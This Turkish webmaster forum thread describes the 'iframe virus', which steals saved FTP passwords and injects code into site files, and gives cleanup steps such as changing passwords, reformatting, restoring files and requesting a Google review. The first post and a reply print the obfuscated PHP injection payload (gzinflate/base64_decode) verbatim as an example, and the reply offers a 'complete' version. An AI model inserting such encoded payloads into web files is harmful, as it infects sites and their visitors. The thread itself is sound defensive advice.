Tüm Araçlar
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al
netbozum
tr.link

İframe virüsü nedir ve nasıl temizlenir?

 6 Mesajlar 1.541 Okunma
acebozum
tr.link

#1
ers0be ers0be new project loading... Kullanıcı
  • Üyelik 04.12.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek PC Teknik
  • Konum İzmir
  • Ad Soyad E** i**
  • Mesajlar 284
  • Beğeniler 116 / 59
  • Ticaret 8, (%100)
Bu aralar sıkça bu konuların artması üzerine ve benim de sıkça başıma geldiğinden dolayı yazma gereği duydum, umarım sorun yaşayanlar en kısa sürede çözüme ulaşırlar.

İframe virüsü nedir?
İframe virüsü sitenize Filezilla, CuteFTP vs. gibi programlar sayesin de genelde index.html-php, header.php, .httaccess dosyalarına bir kod ekler.

Örnek;
#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQk AihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgw AbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIc xkiig9b8JAqU4CRPl+qj9hynS4aZkbT2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNci tRaTiRlos5Re45vUsSM7xlFfAMMTp9xnfLSRY33eNRsBPYkpwu tswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvah QZ5u5nLY0BH6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfd YFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUe s5lRL+6rv6dCyCQ9e8BjBYVeoJUPMarENEFg+LahGmkCxOxfM6 Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#

İframe virüsü filezilla gibi programlar dan giriş yaptığınız da ftp şifresini kendi kaydeder ve şifrenizi değiştirmediğiniz takdirde siz ne kadar silseniz de ftp şifrenizi kayıt ettiği için temizlemeniz neredeyse imkansızdır ve siteniz bir süre sonra Chrome, Firefox gibi web tarayıcıların da sakıncalı site olarak karşınıza çıkar. Benim bir kaç kez başıma geldiği için bu sorunu bir kaç şekilde çözdüm.

İframe kodu temizleme yöntemleri:

-İlk olarak sitenize girdiğiniz zaman bildiğiniz bir süreden sonra siteniz açılıyor ise sol alt tarafta bir siteye yönlendirme mevcuttur bunun linkini göreceksiniz.
eğer eklemediğiniz bir sitenin yüklenmesi varsa bu demek oluyor ki iframe virüsü sitenize yeni bulaşmış, direk ftp şifrenizi değiştirip kodu sitenizden silerseniz bundan kurutulabilirsiniz. Kodun nerelere bulaştığını yukarda belirtmiştik.

-Sitenizden kodları sildiniz fakat sildiğiniz takdir de sürekli kod sitenize bulaşıyor ise yapmanız gereken kesin çözüm;

1-Bilgisayarınıza format atmanız gerekiyor.
Bunun nedeni artık virüsün direk olarak bilgisayarınız da yer alması, siz her ne kadar ftp şifrenizi de değiştirseniz, kodları siteden de silseniz kod sürekli olarak sitenize bulaşacaktır.

2.Format attıktan hemen sonra Filezilla gibi programlar yüklemeden önce FTP şifrenizi değiştirmeniz gerekiyor.

3.Bunları yaptıktan sonra eğer elinizde sitenizin orjinal kodları varsa sitedekilerle değiştirmeniz, eğer yok ise belirttiğim dosyalar daki kodları sitenizden silmeniz.

4.Tüm bunları yaptınız fakat siteniz hala sakıncalı site olarak gözüküyor, sitenizi google webmaster tools' dan ekliyorsunuz ve sitenizin tekrar incelenmesini talep ediyorsunuz. Maksimum 2 hafta diye söyleniyor fakat, en geç 3 gün içinde gerekli değişiklik yapılıyor.

DipNot:İnternetten indirdiğiniz dosyaları virüs taramasından geçirmeyi ihmal etmeyin.
 

 

googleasistan
reklam

#2
Maziliguney Maziliguney Makine Müh. Kullanıcı
  • Üyelik 01.08.2011
  • Yaş/Cinsiyet 35 / E
  • Meslek Makine Müh.
  • Konum Tekirdağ
  • Ad Soyad A** M**
  • Mesajlar 237
  • Beğeniler 46 / 58
  • Ticaret 6, (%100)
#c3284d#
echo(gzinflate(base64_decode("dVr9c9vG0f5X5B8yoExI xn0DEU8d17E3O3tx7PP7mq2X/TNbrj8PO9
#/c3284d#

Bu iframe virüsünü kopyaladığın konudaki arkadaş eksik kopyalamıştı, sen de ordan almışsın ve haliyle eksik arkadaşım :)
İstersen şu örneği koy ki; verdiğin iframe örneği de doğru olsun ;)

#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkbT2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMarENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#
 

 

#Blog'canım: maziliguney.com
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.

#3
ers0be ers0be new project loading... Kullanıcı
  • Üyelik 04.12.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek PC Teknik
  • Konum İzmir
  • Ad Soyad E** i**
  • Mesajlar 284
  • Beğeniler 116 / 59
  • Ticaret 8, (%100)
tekrar böyle bir konu açılınca direk ordan aldım teşekkür ;)
 

 

#4
ShaKa ShaKa JavaScript Kullanıcı
  • Üyelik 29.05.2012
  • Yaş/Cinsiyet 38 / E
  • Meslek Donanım
  • Konum Mersin
  • Ad Soyad E** D**
  • Mesajlar 173
  • Beğeniler 24 / 54
  • Ticaret 5, (%100)
Bayram Öncesi Bana Ugramisti Bu :)
Google amca sagolsun 2 saatte bertaraf etti beni :D
 

 

https://www.okeyy.net/
wmaraci
wmaraci

#5
future future Computer Engineer Kullanıcı
  • Üyelik 27.06.2011
  • Yaş/Cinsiyet 36 / E
  • Meslek Computer Engineer
  • Konum Adana
  • Ad Soyad Y** Y**
  • Mesajlar 1165
  • Beğeniler 92 / 153
  • Ticaret 62, (%100)
Önünüze çıkan her eklentiyi kullanmamakta ve bilmediğiniz temaları yüklememekte de fayda var.
 

 

#6
deviL deviL Paylaşmak Güzeldir. Kullanıcı
  • Üyelik 20.11.2011
  • Yaş/Cinsiyet 41 / E
  • Meslek serbest
  • Konum
  • Ad Soyad ** **
  • Mesajlar 645
  • Beğeniler 161 / 110
  • Ticaret 21, (%100)
Genelde header.php de wp_head kısmına ekliyor. Kodu silip pc'ye format atmak gerekiyor. Başıma geldi çünkü :)

İzlediğim yol şuydu ;

Önce o kodları sildim, ardından pc ye formatı çaktım.
Daha sonra wordpress config'i yeniledim. Sonra bi güzel güncelledim. Peşine config yolunu değiştirdim.
Daha sonra tüm şifreleri değiştirdim.

Şükür bi problem yok..
 

 

Konum neden silindi?
Tema Yapımına Başlayacağım, Kitap Önerisi Lazım
wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
 
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al